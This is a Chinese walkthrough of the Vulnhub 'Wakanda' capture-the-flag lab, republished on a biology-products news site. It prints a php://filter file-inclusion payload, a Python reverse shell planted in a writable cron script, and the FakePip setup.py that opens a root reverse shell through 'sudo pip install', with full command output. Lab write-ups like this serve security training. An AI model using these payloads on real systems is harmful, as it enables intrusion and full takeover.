4000-520-616
欢迎来到免疫在线!(蚂蚁淘生物旗下平台)  请登录 |  免费注册 |  询价篮
主营:原厂直采,平行进口,授权代理(蚂蚁淘为您服务)
咨询热线电话
4000-520-616
当前位置: 首页 > 新闻动态 >
新闻详情
Vulnhub靶机Wakanda渗透测试攻略_h0
来自 : 搜狐网 发布时间:2021-03-25

原标题:Vulnhub靶机Wakanda渗透测试攻略

前言

Wakanda是一个新的交易市场网站,很快会上线了。你的目标是通过黑客技术找到“振金”的确切位置。

本vulnhub靶机环境由xMagass开发,并托管于Vulnhub,这台靶机上包含了很多很酷的技巧。

百度网盘下载地址:

链接:https://pan.baidu.com/s/1xwr1li8sJ-Yc7h_jOtVOcw 密码:aixl

难度级别:中级。

用virtualbox导入Wakanda_1.ova靶机环境,修改其网络连接方式为Bridged(桥接网卡),并选择一个可用于联网的网卡(例如,我使用的无线网卡上网,在图中网卡为Inter(R) Dual Band Wireless-AC 7260)。

1、运行arp-scan识别目标的IP地址

由于kali和wakanda靶机都运行在桥接网卡模式下,因此处于同一个局域网内。我们可以先利用ip a命令查看kali的IP地址,再使用netdiscover或arp-scan命令查看同一个局域网的中另外还有哪些存活主机。

(1) 利用 ip a命令查看kali的IP地址 root@kali:~# ip a 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 08:00:27:e2:40:00 brd ff:ff:ff:ff:ff:ff inet 192.168.0.104/24 brd 192.168.0.255 scope global dynamic eth0 valid_lft 5339sec preferred_lft 5339sec inet6 fe80::a00:27ff:fee2:4000/64 scope link valid_lft forever preferred_lft forever

从中可以看出,kali在网卡eth0上的IP地址和掩码为192.168.0.104/24。

(2) 查看同一个局域网的存活主机 root@kali:~# netdiscover -i eth0 Currently scanning: 192.168.10.0/16 | Screen View: Unique Hosts 7 Captured ARP Req/Rep packets, from 5 hosts. Total size: 420 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.0.1 24:69:68:22:e8:1e 3 180 TP-LINK TECHNOLOGIES CO.,LTD. 192.168.0.103 6c:29:95:10:38:1c 1 60 Intel Corporate 192.168.0.106 08:00:27:ac:03:43 1 60 PCS Systemtechnik GmbH 192.168.0.100 bc:9f:ef:df:b6:e6 1 60 Unknown vendor 192.168.0.102 2c:61:f6:88:ae:9c 1 60 Unknown vendor root@kali:~# root@kali:~# arp-scan -l Interface: eth0, datalink type: EN10MB (Ethernet) Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/) 192.168.0.1 24:69:68:22:e8:1e (Unknown) 192.168.0.103 6c:29:95:10:38:1c Intel Corporate 192.168.0.106 08:00:27:ac:03:43 CADMUS COMPUTER SYSTEMS 192.168.0.101 44:c3:46:11:5b:07 (Unknown) 192.168.0.100 bc:9f:ef:df:b6:e6 (Unknown) 8 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9: 256 hosts scanned in 2.253 seconds (113.63 hosts/sec). 5 responded

从中可以看出,使用CADMUS COMPUTER SYSTEMS网卡的IP就是靶机(vulnhub靶机的网卡地址一般都是CADMUS COMPUTER SYSTEMS),其IP地址为192.168.0.106。

2、枚举和初步搜索信息

利用NMap执行全TCP端口扫描,我发现只有一个感兴趣的web应用程序,该网站上声明了这个即将开放的Vibranium交易市场。另外,还开放了一个运行在非默认端口上的的SSH服务(默认端口22、而此SSH服务运行在端口3333上)。

(1) nmap全端口扫描 root@kali:~# nmap -sS -p- 192.168.0.106 Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2018-09-20 09:56 CST Nmap scan report for localhost (192.168.0.106) Host is up (0.000096s latency). Not shown: 65531 closed ports PORT STATE SERVICE 80/tcp open http 111/tcp open rpcbind 3333/tcp open dec-notes 59197/tcp open unknown MAC Address: 08:00:27:AC:03:43 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 3.15 seconds

从nmap端口扫描结果来看,80端口上开放了一个WEB程序。3333端口上运行的是SSH服务。

(2) 使用Nikto扫描网站漏洞 root@kali:~# nikto -h http://192.168.0.106/ - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.0.106 + Target Hostname: 192.168.0.106 + Target Port: 80 + Start Time: 2018-09-20 09:12:14 (GMT8) --------------------------------------------------------------------------- + Server: Apache/2.4.10 (Debian) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use \'-C all\' to force check all possible dirs) + Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 + OSVDB-3233: /icons/README: Apache default file found. + 7535 requests: 0 error(s) and 7 item(s) reported on remote host + End Time: 2018-09-20 09:13:28 (GMT8) (74 seconds) --------------------------------------------------------------------------- + 1 host(s) tested

从nikto扫描结果来看,并没有任何可利用的漏洞、或信息泄露。

(3) 目录枚举

由于使用nikto没有看到有用信息,我们再尝试使用dirb来暴力枚举目录。国内可以使用御剑等工具,但是这是国外的靶机环境,建议都用kali的通用工具就好。

root@kali:~# dirb http://192.168.0.106/ ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Sep 20 09:19:02 2018 URL_BASE: http://192.168.0.106/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.0.106/ ---- + http://192.168.0.106/admin (CODE:200|SIZE:0) + http://192.168.0.106/backup (CODE:200|SIZE:0) + http://192.168.0.106/index.php (CODE:200|SIZE:1527) + http://192.168.0.106/secret (CODE:200|SIZE:0) + http://192.168.0.106/server-status (CODE:403|SIZE:301) + http://192.168.0.106/shell (CODE:200|SIZE:0) ----------------- END_TIME: Thu Sep 20 09:19:05 2018 DOWNLOADED: 4612 - FOUND: 6

尝试访问http://192.168.0.106/admin, backup, secret等URL,都没有返回任何信息。

(4) 查看网站源码

在网页源码中,找到一条注释,其中包含了有用的信息:

在?lang=fr中,lang表示可切换的网站语言(网站常常具支持多语言,例如英语、法语、中文等),fr表示法语。我们尝试在HTTP URL中添加这个参数,切换语言为法语。

我们发现之前的英语内容切换成了法语:

原英语内容: Next opening of the largest vibranium market. The products come directly from the wakanda. stay tuned! 现法语内容: Prochaine ouverture du plus grand marché du vibranium. Les produits viennent directement du wakanda. Restez à l\'écoute!

根据以往的渗透测试经验,这里很可能存在本地文件包含(LFI)或远程文件包含(RFI)漏洞。

3、利用LFI读取源码

在尝试访问http://192.168.0.106/?lang=index等url未获得有用信息后,我们尝试php伪协议。http://192.168.0.106/?lang=php://filter/convert.base64-encode/resource=index

得到了index.php的base64加密后的源码,解密后发现了一个Password。

PD9waHAKJHBhc3N3b3JkID0iTmlhbWV5NEV2ZXIyMjchISEiIDsvL0kgaGF2ZSB0byByZW1lbWJlciBpdAoKaWYgKGlzc2V0KCRfR0VUWydsYW5nJ10pKQp7CmluY2x1ZGUoJF9HRVRbJ2xhbmcnXS4iLnBocCIpOwp9Cgo/PgoKCgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlZpYnJhbml1bSBtYXJrZXQiPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJtYW1hZG91Ij4KCiAgICA8dGl0bGU+VmlicmFuaXVtIE1hcmtldDwvdGl0bGU+CgoKICAgIDxsaW5rIGhyZWY9ImJvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CgogICAgCiAgICA8bGluayBocmVmPSJjb3Zlci5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CiAgPC9oZWFkPgoKICA8Ym9keSBjbGFzcz0idGV4dC1jZW50ZXIiPgoKICAgIDxkaXYgY2xhc3M9ImNvdmVyLWNvbnRhaW5lciBkLWZsZXggdy0xMDAgaC0xMDAgcC0zIG14LWF1dG8gZmxleC1jb2x1bW4iPgogICAgICA8aGVhZGVyIGNsYXNzPSJtYXN0aGVhZCBtYi1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8aDMgY2xhc3M9Im1hc3RoZWFkLWJyYW5kIj5WaWJyYW5pdW0gTWFya2V0PC9oMz4KICAgICAgICAgIDxuYXYgY2xhc3M9Im5hdiBuYXYtbWFzdGhlYWQganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJuYXYtbGluayBhY3RpdmUiIGhyZWY9IiMiPkhvbWU8L2E+CiAgICAgICAgICAgIDwhLS0gPGEgY2xhc3M9Im5hdi1saW5rIGFjdGl2ZSIgaHJlZj0iP2xhbmc9ZnIiPkZyL2E+IC0tPgogICAgICAgICAgPC9uYXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvaGVhZGVyPgoKICAgICAgPG1haW4gcm9sZT0ibWFpbiIgY2xhc3M9ImlubmVyIGNvdmVyIj4KICAgICAgICA8aDEgY2xhc3M9ImNvdmVyLWhlYWRpbmciPkNvbWluZyBzb29uPC9oMT4KICAgICAgICA8cCBjbGFzcz0ibGVhZCI+CiAgICAgICAgICA8P3BocAogICAgICAgICAgICBpZiAoaXNzZXQoJF9HRVRbJ2xhbmcnXSkpCiAgICAgICAgICB7CiAgICAgICAgICBlY2hvICRtZXNzYWdlOwogICAgICAgICAgfQogICAgICAgICAgZWxzZQogICAgICAgICAgewogICAgICAgICAgICA/PgoKICAgICAgICAgICAgTmV4dCBvcGVuaW5nIG9mIHRoZSBsYXJnZXN0IHZpYnJhbml1bSBtYXJrZXQuIFRoZSBwcm9kdWN0cyBjb21lIGRpcmVjdGx5IGZyb20gdGhlIHdha2FuZGEuIHN0YXkgdHVuZWQhCiAgICAgICAgICAgIDw/cGhwCiAgICAgICAgICB9Cj8+CiAgICAgICAgPC9wPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1zZWNvbmRhcnkiPkxlYXJuIG1vcmU8L2E+CiAgICAgICAgPC9wPgogICAgICA8L21haW4+CgogICAgICA8Zm9vdGVyIGNsYXNzPSJtYXN0Zm9vdCBtdC1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8cD5NYWRlIGJ5PGEgaHJlZj0iIyI+QG1hbWFkb3U8L2E+PC9wPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvb3Rlcj4KICAgIDwvZGl2PgoKCgogIAoKPC9ib2R5PjwvaHRtbD4=

由于网站没有登录后台,我们尝试利用这个密码登录SSH服务。在尝试用户名root、admin等无效后,我们发现网站下文的信息Made by@mamadou,于是尝试用户名mamadou。

root@kali:~# ssh mamadou@192.168.0.106 -p 3333 The authenticity of host \'[192.168.0.106]:3333 ([192.168.0.106]:3333)\' can\'t be established. ECDSA key fingerprint is SHA256:X+fXjgH34Ta5l6I4kUSpiVZNBGGBGtjxZxgyU7KCFwk. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added \'[192.168.0.106]:3333\' (ECDSA) to the list of known hosts. mamadou@192.168.0.106\'s password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Sep 19 06:26:23 2018 from kali Python 2.7.9 (default, Jun 29 2016, 13:08:31) [GCC 4.9.2] on linux2 Type \"help\", \"copyright\", \"credits\" or \"license\" for more information. ls Traceback (most recent call last): File \"\", line 1, in NameError: name \'ls\' is not defined 4、获得敏感信息 (1)切换BASH环境

登录后,发现mamadou使用的shell不是/bin/bash,而是python。

我们可以执行python命令来获得靶机上的敏感信息。也可以利用python语句切换到/bin/bash。

import pty pty.spawn(\"/bin/bash\") mamadou@Wakanda1:~$ id uid=1000(mamadou) gid=1000(mamadou) groups=1000(mamadou) mamadou@Wakanda1:~$

利用上面的import pty、pty.spawn(\"/bin/bash\")两条命令,即可切换到bash下。

(2)获得第一个flag

在mamadou的用户目录下,找到了第一个flag。

mamadou@Wakanda1:~$ pwd /home/mamadou mamadou@Wakanda1:~$ ls -lar total 24 -rw-r--r-- 1 mamadou mamadou 675 Aug 1 13:15 .profile -rw-r--r-- 1 mamadou mamadou 41 Aug 1 15:52 flag1.txt -rw-r--r-- 1 mamadou mamadou 3515 Aug 1 13:15 .bashrc -rw-r--r-- 1 mamadou mamadou 220 Aug 1 13:15 .bash_logout lrwxrwxrwx 1 root root 9 Aug 5 02:24 .bash_history - /dev/null drwxr-xr-x 4 root root 4096 Aug 1 15:23 .. drwxr-xr-x 2 mamadou mamadou 4096 Sep 19 06:28 . mamadou@Wakanda1:~$ cat flag1.txt Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc

另外,我们再搜索其他目录,查看是否有flag。

mamadou@Wakanda1:~$ find / --name \"*flag*\" 2 /dev/null

没有发现flag文件,可能是mamadou无权访问。

在网站目录/var/www/html下,也未找到有用的信息。

mamadou@Wakanda1:~$ cd /var/www/html/ mamadou@Wakanda1:/var/www/html$ ls -la total 4572 drwxr-xr-x 2 root root 4096 Aug 1 16:51 . drwxr-xr-x 3 root root 4096 Aug 1 13:29 .. -rw-r--r-- 1 root root 0 Aug 1 16:50 admin -rw-r--r-- 1 root root 0 Aug 1 16:50 backup -rw-r--r-- 1 root root 4510077 Aug 1 14:26 bg.jpg -rw-r--r-- 1 root root 140936 Aug 1 14:07 bootstrap.css -rw-r--r-- 1 root root 1464 Aug 1 14:29 cover.css -rw-r--r-- 1 root root 141 Aug 1 16:45 fr.php -rw-r--r-- 1 root root 0 Aug 1 16:50 hahaha -rw-r--r-- 1 root root 0 Aug 1 16:51 hohoho -rw-r--r-- 1 root root 1811 Aug 1 16:44 index.php -rw-r--r-- 1 root root 0 Aug 1 16:50 secret -rw-r--r-- 1 root root 40 Aug 1 16:51 secret.txt -rw-r--r-- 1 root root 0 Aug 1 16:50 shell -rw-r--r-- 1 root root 0 Aug 1 16:50 troll mamadou@Wakanda1:/var/www/html$ cat secret.txt Congratulations! Nope!I am joking....

这里可以看到,dirb扫描出的admin等欺骗性文件的大小都为0,没有任何内容。

(3)查看用户是否有sudo权限 mamadou@Wakanda1:~$ sudo -l [sudo] password for mamadou: Sorry, user mamadou may not run sudo on Wakanda1.

发现mamadou用户没有sudo权限。

5、利用其他用户的权限 (1) 查看其他用户

这时,我们再查看靶机上是否有其他用户。

mamadou@Wakanda1:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false Debian-exim:x:104:109::/var/spool/exim4:/bin/false messagebus:x:105:110::/var/run/dbus:/bin/false statd:x:106:65534::/var/lib/nfs:/bin/false avahi-autoipd:x:107:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin mamadou:x:1000:1000:Mamadou,,,,Developper:/home/mamadou:/usr/bin/python devops:x:1001:1002:,,,:/home/devops:/bin/bash

从中发现另一个devops用户。我们再搜索他是否有敏感信息:

mamadou@Wakanda1:~$ cd /home/devops/ mamadou@Wakanda1:/home/devops$ ls -la total 28 drwxr-xr-x 3 devops developer 4096 Sep 19 06:50 . drwxr-xr-x 4 root root 4096 Aug 1 15:23 .. lrwxrwxrwx 1 root root 9 Aug 5 02:25 .bash_history - /dev/null -rw-r--r-- 1 devops developer 220 Aug 1 15:23 .bash_logout -rw-r--r-- 1 devops developer 3515 Aug 1 15:23 .bashrc -rw-r----- 1 devops developer 42 Aug 1 15:57 flag2.txt -rw-r--r-- 1 devops developer 675 Aug 1 15:23 .profile mamadou@Wakanda1:/home/devops$ cat flag2.txt cat: flag2.txt: Permission denied

发现了一个flag2.txt,但是mamadou没权限查看其内容。于是尝试切换到该用户。没有密码,只能想其他方法。

(2)信息搜索

在/tmp目录中,发现一个新建的test文件:

mamadou@Wakanda1:~$ cd /tmp mamadou@Wakanda1:/tmp$ ls -laR .: total 32 drwxrwxrwt 7 root root 4096 Sep 19 21:42 . drwxr-xr-x 22 root root 4096 Aug 1 13:05 .. drwxrwxrwt 2 root root 4096 Sep 19 20:49 .font-unix drwxrwxrwt 2 root root 4096 Sep 19 20:49 .ICE-unix -rw-r--r-- 1 devops developer 4 Sep 19 21:46 test drwxrwxrwt 2 root root 4096 Sep 19 20:49 .Test-unix drwxrwxrwt 2 root root 4096 Sep 19 20:49 .X11-unix drwxrwxrwt 2 root root 4096 Sep 19 20:49 .XIM-unix mamadou@Wakanda1:/tmp$ date Wed Sep 19 21:47:59 EDT 2018

test文件的创建时间为Sep 19 21:46,明显晚于其他文件的创建日期;使用date命令查看靶机的当前时间,为Wed Sep 19 21:47:59,说明test文件是2分钟内才新建的。我们怀疑靶机上运行了一个程序,定期执行创建test文件。

最终,在/srv目录下,找到了这个定期运行的文件:

mamadou@Wakanda1:/tmp$ cd /srv/ mamadou@Wakanda1:/srv$ ls -la total 12 drwxr-xr-x 2 root root 4096 Aug 1 17:52 . drwxr-xr-x 22 root root 4096 Aug 1 13:05 .. -rw-r--rw- 1 devops developer 37 Sep 19 21:49 .antivirus.py mamadou@Wakanda1:/srv$ cat .antivirus.py open(\'/tmp/test\',\'w\').write(\'test\')

文件.antivirus.py是一个python脚本,其拥有者是devops,所属组为developer,而且任何人都可以修改它!

我们可以通过修改其文件内容,尝试获得反向shell。

建立反向shell

修改python脚本,添加反向shell的内容:

mamadou@Wakanda1:/srv$ vi .antivirus.py mamadou@Wakanda1:/srv$ cat .antivirus.py open(\'/tmp/test\',\'w\').write(\'test\') import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((\"192.168.0.104\",1235)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call([\"/bin/bash\",\"-i\"])

修改完成后,我们侦听1235端口,等待靶机的反向shell连接:

root@kali:~# nc -lvvp 1235

在等了几分钟后,成功获得了shell连接。并获得了第二个flag。

root@kali:~# nc -lvvp 1235 listening on [any] 1235 ... connect to [192.168.0.104] from localhost [192.168.0.106] 60823 bash: cannot set terminal process group (1107): Inappropriate ioctl for device bash: no job control in this shell devops@Wakanda1:/$ id uid=1001(devops) gid=1002(developer) groups=1002(developer) devops@Wakanda1:/$ cd devops@Wakanda1:~$ pwd /home/devops devops@Wakanda1:~$ ls -la total 28 drwxr-xr-x 3 devops developer 4096 Sep 19 06:50 . drwxr-xr-x 4 root root 4096 Aug 1 15:23 .. lrwxrwxrwx 1 root root 9 Aug 5 02:25 .bash_history - /dev/null -rw-r--r-- 1 devops developer 220 Aug 1 15:23 .bash_logout -rw-r--r-- 1 devops developer 3515 Aug 1 15:23 .bashrc -rw-r----- 1 devops developer 42 Aug 1 15:57 flag2.txt -rw-r--r-- 1 devops developer 675 Aug 1 15:23 .profile devops@Wakanda1:~$ cat flag2.txt Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098 6、提权到root

我们的最终目标是获得root权限。

(1)查看用户devops的sudo权限 devops@Wakanda1:/$ sudo -l sudo -l Matching Defaults entries for devops on Wakanda1: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin User devops may run the following commands on Wakanda1: (ALL) NOPASSWD: /usr/bin/pip

发现用户devops可无密码执行的sudo命令只有/usr/bin/pip。从来没有遇到这种情况,在网上搜索了好久,找到一种提权方法:fakepip exploit。具体的漏洞利用方法已写得很清楚。

(2)利用pip升级漏洞

由于在靶机上无法高效地编辑exp,我们先在kali上将exp下载下来,再编辑,最后上传到靶机上。

A.下载

root@kali:~# mkdir FakePip root@kali:~# cd FakePip/ root@kali:~/FakePip# wget https://raw.githubusercontent.com/0x00-0x00/FakePip/master/setup.py --2018-09-20 10:30:04-- https://raw.githubusercontent.com/0x00-0x00/FakePip/master/setup.py Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.108.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.108.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 983 [text/plain] Saving to: ?.etup.py? setup.py 100%[============================ ] 983 --.-KB/s in 0s 2018-09-20 10:30:05 (4.20 MB/s) - ?.etup.py?.saved [983/983]

B.修改反弹地址

修改setup.py中的RHOST = \'10.0.0.1\' # change this语句为kali的IP地址。例如,我的kali的IP地址为:192.168.0.104。

root@kali:~/FakePip# vi setup.py root@kali:~/FakePip# cat setup.py from setuptools import setup from setuptools.command.install import install import base64 import os class CustomInstall(install): def run(self): install.run(self) RHOST = \'192.168.0.104\' # change this reverse_shell = \'python -c \"import os; import pty; import socket; lhost = \\\'%s\\\'; lport = 443; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\\\'HISTFILE\\\', \\\'/dev/null\\\'); pty.spawn(\\\'/bin/bash\\\'); s.close();\"\' % RHOST encoded = base64.b64encode(reverse_shell) os.system(\'echo %s|base64 -d|bash\' % encoded) setup(name=\'FakePip\', version=\'0.0.1\', deion=\'This will exploit a sudoer able to /usr/bin/pip install *\', url=\'https://github.com/0x00-0x00/fakepip\', author=\'zc00l\', author_email=\'andre.marques@esecurity.com.br\', license=\'MIT\', zip_safe=False, cmd \'install\': CustomInstall})

C.利用python建立SimpleHTTPServer

root@kali:~/FakePip# python -m SimpleHTTPServer 8888 Serving HTTP on 0.0.0.0 port 8888 ...

执行python -m SimpleHTTPServer 8888后,就在KALI上运行了一个简易的HTTP服务器,在靶机上就可从这个HTTP服务器下载setup.py脚本了。

D.下载exp

在靶机的devops用户下,下载setup.py脚本。

devops@Wakanda1:~$ mkdir fakepip devops@Wakanda1:~$ cd fakepip devops@Wakanda1:~/fakepip$ wget http://192.168.0.104:8888/setup.py --2018-09-19 22:34:45-- http://192.168.0.104:8888/setup.py Connecting to 192.168.0.104:8888... connected. HTTP request sent, awaiting response... 200 OK Length: 988 [text/plain] Saving to: ?.etup.py? 0K 100% 127M=0s 2018-09-19 22:34:45 (127 MB/s) - ?.etup.py?.saved [988/988] devops@Wakanda1:~/fakepip$ ls setup.py

可以看到,成功地下载了脚本。

E.在kali中侦听443端口

root@kali:~/FakePip# nc -lvvp 443

F.执行exp,获得反向shell

在靶机上执行命令sudo /usr/bin/pip install . --upgrade --force-reinstall,即可在kali上发现,成功获得了反向shell。

devops@Wakanda1:~/fakepip$ sudo /usr/bin/pip install . --upgrade --force-reinstall

在kali上的反向shell权限是root,即最高权限。

root@kali:~/FakePip# nc -lvvp 443 listening on [any] 443 ... connect to [192.168.0.104] from localhost [192.168.0.106] 55143 root@Wakanda1:/tmp/pip-G7z4Td-build# id uid=0(root) gid=0(root) groups=0(root) root@Wakanda1:/tmp/pip-G7z4Td-build# 7、查看最终flag root@Wakanda1:/tmp/pip-G7z4Td-build# cd cd root@Wakanda1:~# ls -la ls -la total 20 drwx------ 2 root root 4096 Aug 5 02:26 . drwxr-xr-x 22 root root 4096 Aug 1 13:05 .. -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc -rw-r--r-- 1 root root 140 Nov 19 2007 .profile -rw-r----- 1 root root 429 Aug 1 15:16 root.txt root@Wakanda1:~# cat root.txt cat root.txt _ _.--.____.--._ ( )=.-\":;:;:;;\':;:;:;\"-._ \\\\\\:;:;:;:;:;;:;::;:;:;:\\ \\\\\\:;:;:;:;:;;:;:;:;:;:;\\ \\\\\\:;::;:;:;:;:;::;:;:;:\\ \\\\\\:;:;:;:;:;;:;::;:;:;:\\ \\\\\\:;::;:;:;:;:;::;:;:;:\\ \\\\\\;;:;:_:--:_:_:--:_;:;\\ \\\\\\_.-\" \"-._\\ \\\\ \\\\ \\\\ \\\\ Wakanda 1 - by @xMagass \\\\ \\\\ Congratulations You are Root! 821ae63dbe0c573eff8b69d451fb21bc

*本文作者:laffray,转载请注明来自FreeBuf.COM返回搜狐,查看更多

责任编辑:

本文链接: http://arpzgmbh.immuno-online.com/view-748937.html

发布于 : 2021-03-25 阅读(0)